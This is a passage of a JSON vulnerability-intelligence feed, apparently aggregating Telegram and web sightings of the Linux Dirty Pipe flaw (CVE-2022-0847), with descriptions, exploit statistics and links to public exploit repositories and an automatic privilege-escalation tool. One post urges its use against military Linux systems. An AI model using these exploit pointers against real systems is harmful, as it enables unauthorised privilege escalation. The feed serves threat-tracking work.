Linux, \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0431\u044b\u043b\u043e \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d\u043e \u043e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 CVE-2022-0847. \u041e\u043d\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u044f\u0434\u0440\u0430 Linux \u043e\u0442 5.8 \u0434\u043e \u043b\u044e\u0431\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0434\u043e 5.16.11, 5.15.25 \u0438 5.10.102, \u0438 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439.", "creation_timestamp": "2022-08-18T05:00:04.000000Z"}, {"uuid": "e76fc79e-13bd-4c06-ad12-ec86ec8d180a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/linkersec/163", "content": "Learning Linux kernel exploitation \u2014 Part 2 \u2014 CVE-2022-0847\n\nA detailed article by 0xricksanchez about the Dirty Pipe vulnerability and its exploitation. The article also recaps Dirty Cow and compares it to Dirty Pipe.", "creation_timestamp": "2022-05-15T00:03:13.000000Z"}, {"uuid": "c16288df-a7dc-4802-9388-c2727a100a13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "Telegram/fwfJ93itQRaGWkEs7bikv_0LIwCtR-PH-z3yWQDsLhIpXwM", "content": "", "creation_timestamp": "2025-07-02T03:00:05.000000Z"}, {"uuid": "ea04badb-b625-4e03-ad73-c24927f9d150", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1626", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aImplementation of Max Kellermann's exploit for CVE-2022-0847\nURL\uff1ahttps://github.com/0xIronGoat/dirty-pipe", "creation_timestamp": "2022-03-08T15:49:35.000000Z"}, {"uuid": "fb0ee2ef-5e80-467c-959a-7ffa68e24333", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/linkersec/171", "content": "Exploration of the Dirty Pipe Vulnerability (CVE-2022-0847)\n\nAn article by Valentin Obst and Martin Claus covering the Dirty Pipe vulnerability. The article also suggests a few approaches to investigating Linux kernel bugs.", "creation_timestamp": "2022-06-30T01:53:10.000000Z"}, {"uuid": "864b78a4-9a96-49bd-99ba-9a3b2172fac3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/ctinow/48457", "content": "CVE-2022-0847 aka Dirty Pipe vulnerability in Linux kernel\n\nhttps://ift.tt/4dOLxXq", "creation_timestamp": "2022-03-14T15:21:23.000000Z"}, {"uuid": "100af8c6-5515-4ec1-a9e3-cdf8e64682a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/true_secator/7103", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u041b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u0438\u0438 \u041a\u0430\u0441\u043f\u0435\u0440\u0441\u043a\u043e\u0433\u043e \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442 \u0431\u043e\u043c\u0431\u0438\u0442\u044c \u043e\u0442\u0447\u0435\u0442\u0430\u043c\u0438, \u043d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u043f\u043e\u0434\u043e\u0433\u043d\u0430\u043b\u0438 \u0430\u043d\u0430\u043b\u0438\u0442\u0438\u043a\u0443 \u043f\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430\u043c \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c \u0437\u0430 \u043f\u0435\u0440\u0432\u044b\u0439 \u043a\u0432\u0430\u0440\u0442\u0430\u043b 2025 \u0433\u043e\u0434\u0430.\n\n\u0412 \u043f\u0435\u0440\u0432\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2025 \u0433\u043e\u0434\u0430 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u043b\u0430\u0441\u044c \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0432 2024 \u0433\u043e\u0434\u0443, \u0442\u0430\u043a \u043a\u0430\u043a \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0440\u0430\u043d\u0435\u0435 \u043d\u0435 \u043c\u043e\u0433\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u043e\u0434\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438.\n\n\u0412 \u0446\u0435\u043b\u043e\u043c \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438 \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0430 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u044e\u0442 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0431\u043e\u043b\u044c\u0448\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0434\u0438\u043d\u0430\u043c\u0438\u043a\u0430 \u0438\u0445 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0438 \u0432\u043e \u043c\u043d\u043e\u0433\u043e\u043c \u043f\u043e\u0432\u0442\u043e\u0440\u044f\u0435\u0442 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u0433\u043e\u0434\u044b.\n\n\u0412 \u0446\u0435\u043b\u043e\u043c \u043c\u043d\u043e\u0433\u0438\u0435 CWE \u0438\u0437 TOP 10 \u0434\u043b\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u044b\u0445 \u0440\u0435\u0448\u0435\u043d\u0438\u0439 Microsoft \u0438 \u044f\u0434\u0440\u0430 Linux \u0441\u043e\u0432\u043f\u0430\u0434\u0430\u044e\u0442 \u0438\u043b\u0438 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u043c\u0438, \u0430 \u0437\u043d\u0430\u0447\u0438\u0442, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u044b \u043d\u0430 \u0441\u0445\u043e\u0436\u0438\u0445 \u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0430\u0445, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u0447\u0430\u0441\u0442\u043e \u043a \u00ab\u043f\u043e\u0440\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044e\u00bb \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u0432 \u0430\u0442\u0430\u043a \u0434\u043b\u044f Linux \u043d\u0430 Windows \u0438 \u043d\u0430\u043e\u0431\u043e\u0440\u043e\u0442.\n\n\u0412 \u043f\u0435\u0440\u0432\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2025 \u0433\u043e\u0434\u0430 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0430\u0442\u0430\u043a \u0441 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430\u043c\u0438 \u0434\u043b\u044f \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Windows \u0432\u044b\u0440\u043e\u0441\u043b\u043e \u043f\u043e \u0441\u0440\u0430\u0432\u043d\u0435\u043d\u0438\u044e \u0441 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u043c \u043f\u0435\u0440\u0438\u043e\u0434\u043e\u043c \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u0433\u043e\u0434\u0430.\n\n\u041a\u0430\u043a \u0438 \u043f\u0440\u0435\u0436\u0434\u0435, \u043b\u044c\u0432\u0438\u043d\u0430\u044f \u0434\u043e\u043b\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u0431\u044b\u043b\u0430 \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u0430 \u043d\u0430 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Microsoft Office.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e \u0447\u0430\u0449\u0435 \u0438\u0445 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b \u0434\u043b\u044f \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Windows \u043a \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u0441\u0442\u0430\u0440\u044b\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c: CVE-2018-0802, CVE-2017-11882 (\u043e\u0431\u0435 RCE \u0432 Equation Editor), CVE-2017-0199 (Microsoft Office \u0438 WordPad).\n\n\u0412\u0441\u0435 \u0442\u0440\u0438 \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0438\u0441\u044c \u0441\u0430\u043c\u044b\u043c\u0438 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u043c\u0438 \u043d\u0430 \u043f\u0440\u043e\u0442\u044f\u0436\u0435\u043d\u0438\u0438 2024 \u0433\u043e\u0434\u0430, \u0438 \u043c\u044b \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u0435\u043c, \u0447\u0442\u043e \u0442\u0430\u043a\u0430\u044f \u0442\u0435\u043d\u0434\u0435\u043d\u0446\u0438\u044f \u0441\u043e\u0445\u0440\u0430\u043d\u0438\u0442\u0441\u044f \u0438 \u0432 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u043c.\n\n\u0417\u0430 \u043d\u0438\u043c\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0442 \u043d\u0435 \u043c\u0435\u043d\u0435\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0432 WinRAR \u0438 \u0432 \u0441\u0430\u043c\u043e\u0439 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Windows: CVE-2023-38831 (WinRAR), CVE-2024-35250 (\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430\u00a0ks.sys) \u0438 CVE-2022-3699 (\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430 Lenovo Diagnostics).\n\n\u0414\u043b\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Linux \u0431\u043e\u043b\u044c\u0448\u0435 \u0432\u0441\u0435\u0433\u043e \u0431\u044b\u043b\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u043a \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c: CVE-2022-0847 (Dirty Pipe), CVE-2019-13272 (\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0439 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u043d\u0430\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439) \u0438 CVE-2021-3156 (\u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u0443\u0447\u0438 \u0432 \u0443\u0442\u0438\u043b\u0438\u0442\u0435\u00a0sudo).\n\n\u0412 \u043f\u0435\u0440\u0432\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2025 \u0433\u043e\u0434\u0430 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u043a\u0430\u043a \u0441\u0430\u043c\u043e\u0435 \u0441\u043b\u043e\u0436\u043d\u043e\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0435, \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442 \u043b\u0438\u0434\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u043e \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0443 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0444\u0438\u043a\u0441\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u044b\u0439 \u0440\u043e\u0441\u0442 \u0447\u0438\u0441\u043b\u0430 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u043a \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430\u043c - \u044d\u0442\u0430 \u0442\u0435\u043d\u0434\u0435\u043d\u0446\u0438\u044f \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u043b\u0430\u0441\u044c \u0438 \u043d\u0430 \u043f\u0440\u043e\u0442\u044f\u0436\u0435\u043d\u0438\u0438 \u0432\u0441\u0435\u0433\u043e \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u0433\u043e\u0434\u0430.\n\n\u0422\u0430\u043a\u0436\u0435 \u0443\u0432\u0435\u043b\u0438\u0447\u0438\u043b\u0430\u0441\u044c \u0434\u043e\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 Microsoft Office.\n\n\u0418\u0437\u0443\u0447\u0438\u0432 \u0434\u0430\u043d\u043d\u044b\u0435 \u043e\u0431 \u0430\u0442\u0430\u043a\u0430\u0445 APT, \u0432 \u041b\u041a \u0432\u044b\u0434\u0435\u043b\u0438\u043b\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0447\u0430\u0441\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0435\u0441\u044f \u0432 \u043f\u0435\u0440\u0432\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2025 \u0433\u043e\u0434\u0430: CVE-2025-0282, CVE-2024-21887 \u0438 CVE-2025-0283 (Ivanti Connect Secure), CVE-2020-1472 (Netlogon Windows), CVE-2023-46805 (Ivanti ICS), CVE-2023-48788 (Fortinet) \u0438 \u0434\u0440.\n\n\u041e\u0442\u043c\u0435\u0442\u0438\u043c, \u0447\u0442\u043e \u0432 TOP 10 \u0432\u0435\u0440\u043d\u0443\u043b\u0430\u0441\u044c \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Zerologon, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0443 \u0434\u043e\u043c\u0435\u043d\u0430.\n\n\u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u044b\u043b\u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u044b \u0432 \u043f\u0435\u0440\u0432\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2025 \u0433\u043e\u0434\u0430 \u0440\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u041b\u041a \u0432\u044b\u0434\u0435\u043b\u0438\u043b\u0438: \n\n- ZDI-CAN-25373: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0435\u043d\u0438\u044f \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432 lnk-\u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u041e\u0421 Windows;\n\n- CVE-2025-21333: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0431\u0443\u0444\u0435\u0440\u0430 \u0432 \u043a\u0443\u0447\u0435 \u0432 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0435 vkrnlintvsp.sys;\n\n- CVE-2025-24071: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0442\u0435\u0447\u043a\u0438 NetNTLM-\u0445\u044d\u0448\u0430 \u0432 \u0438\u043d\u0434\u0435\u043a\u0441\u0430\u0442\u043e\u0440\u0435 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b.\n\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0430\u044f \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0430 \u0438 \u0438\u043d\u0444\u043e\u0433\u0440\u0430\u0444\u0438\u043a\u0430 - \u0432 \u043e\u0442\u0447\u0435\u0442\u0435.", "creation_timestamp": "2025-06-04T18:00:07.000000Z"}, {"uuid": "9c1be702-9677-44e1-b1b6-a3dec282a558", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "Telegram/TXmZ8EBGvdc4uufvEqu6hfgyjEc7K_gjD1Jpp8Uzvu6-KK0", "content": "", "creation_timestamp": "2023-03-23T09:18:19.000000Z"}, {"uuid": "106889b7-3a32-4d6f-93b0-64c7e5d8d04c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/ctinow/48456", "content": "CVE-2022-0847 aka Dirty Pipe vulnerability in Linux kernel\n\nhttps://ift.tt/4dOLxXq", "creation_timestamp": "2022-03-14T15:16:42.000000Z"}, {"uuid": "026f4dcc-8b4f-42c6-92b0-2f5826f6cb57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "Telegram/pu6Zbp3_mAgoSo0E5b4b-8w4gIiu2-u_zIbpcfJ6GpUgtg", "content": "", "creation_timestamp": "2023-11-24T00:39:24.000000Z"}, {"uuid": "bc4764b0-0a57-41c6-a1e7-383f0e0f442c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "Telegram/EidKnczSSqyjBcQ7sKuQ5Eq9NVHE7CjrCRWQNDH8CB5oRZc", "content": "", "creation_timestamp": "2024-04-24T17:42:10.000000Z"}, {"uuid": "f146bd90-1d01-481c-b4e1-99699918cc55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/OpRussiaTools/29", "content": "Most of the Russian military is using Astra Linux, a distribution of Linux specifically designed for security. \n\nThe DirtyPipe vulnerability ( CVE-2022-0847) makes it vulnerable to privilege escalation\n\nhttps://dirtypipe.cm4all.com/\n\nCredit : @Three_Cube (on twitter)", "creation_timestamp": "2022-04-20T06:18:55.000000Z"}, {"uuid": "9d9fe359-d6a5-473f-849d-74ebded7c7b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/arpsyndicate/210", "content": "#ExploitObserverAlert\n\nCVE-2022-0847\n\nDESCRIPTION: Exploit Observer has 349 entries related to CVE-2022-0847. A flaw was found in the way the \"flags\" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system.\n\nFIRST-EPSS: 0.075840000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-11-17T05:28:30.000000Z"}, {"uuid": "7c57ab7f-1835-4303-95c7-4bc16fcc649c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/LockBitRaasRansomware/22829", "content": "Traitor - Exploit Low-Hanging Fruit Automatically\n\n\ud83c\udfa9 Nearly all of GTFOBins\n\ud83c\udfa9 Writeable docker.sock\n\ud83c\udfa9 CVE-2022-0847 (Dirty pipe)\n\ud83c\udfa9 CVE-2021-4034 (pwnkit)\n\ud83c\udfa9 CVE-2021-3560\n\n\nhttps://github.com/liamg/traitor", "creation_timestamp": "2024-04-24T17:42:11.000000Z"}, {"uuid": "8a35ff77-9a82-4935-b2c2-d9382ad65941", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "Telegram/1dFaT-a58trqZmjrnPNSReAkZuxdxrDNl1oCKPYlyliUJw", "content": "", "creation_timestamp": "2022-03-09T09:24:51.000000Z"}, {"uuid": "fd749d53-55b3-4f38-ad51-e945ea1136e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "Telegram/fYxZDeRf0AQYmg0vOdPSbBKIryVA2SNSkAi240alanTzDA", "content": "", "creation_timestamp": "2022-03-09T06:57:03.000000Z"}, {"uuid": "226a062e-0865-42ad-9878-bbfe8f20b3a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "Telegram/CeQ1yh7OvzihbEoW1SoyhVOZQiuMkQZ5ztAxiTGIHTmr8QU", "content": "", "creation_timestamp": "2025-03-26T04:00:06.000000Z"}, {"uuid": "caca129a-1b9c-48e6-b685-fbca50ebe2fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "Telegram/iHBlR7HiQYAKo3u9PWvhUCFNHGmyaN8ahtUaNZl3AgV9dFg", "content": "", "creation_timestamp": "2025-01-21T16:00:09.000000Z"}, {"uuid": "7dbc8cfc-a577-4e58-b5f8-ca691877e6c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "Telegram/GD5qiq8Yh63VBupkG3KSjV9OuHErr4ZdzzhP_utm5c_UDQ", "content": "", "creation_timestamp": "2022-07-08T10:43:17.000000Z"}, {"uuid": "140dfcd9-fdb8-4f4c-a937-e2fcb926d198", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/WARLOCK_DARK_ARMY_OFFICIALS/3136", "content": "Traitor - Exploit Low-Hanging Fruit Automatically\n\n\ud83c\udfa9 Nearly all of GTFOBins\n\ud83c\udfa9 Writeable docker.sock\n\ud83c\udfa9 CVE-2022-0847 (Dirty pipe)\n\ud83c\udfa9 CVE-2021-4034 (pwnkit)\n\ud83c\udfa9 CVE-2021-3560\n\n\nhttps://github.com/liamg/traitor", "creation_timestamp": "2023-09-26T19:41:26.000000Z"}, {"uuid": "6030bd8d-99eb-482f-8844-6bdda46cb216", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "Telegram/VBUjHc3zKURuIEBpFT3zpqi9rp6T1KaYAcc3Ky2q-U_YsjM", "content": "", "creation_timestamp": "2025-04-19T23:00:06.000000Z"}, {"uuid": "2616433d-cfd4-4449-86ec-142dfa916ca6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/699", "content": "dirty pipe  \n00 -  \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0432 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u0430\u0445, \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u043d\u044b\u0445 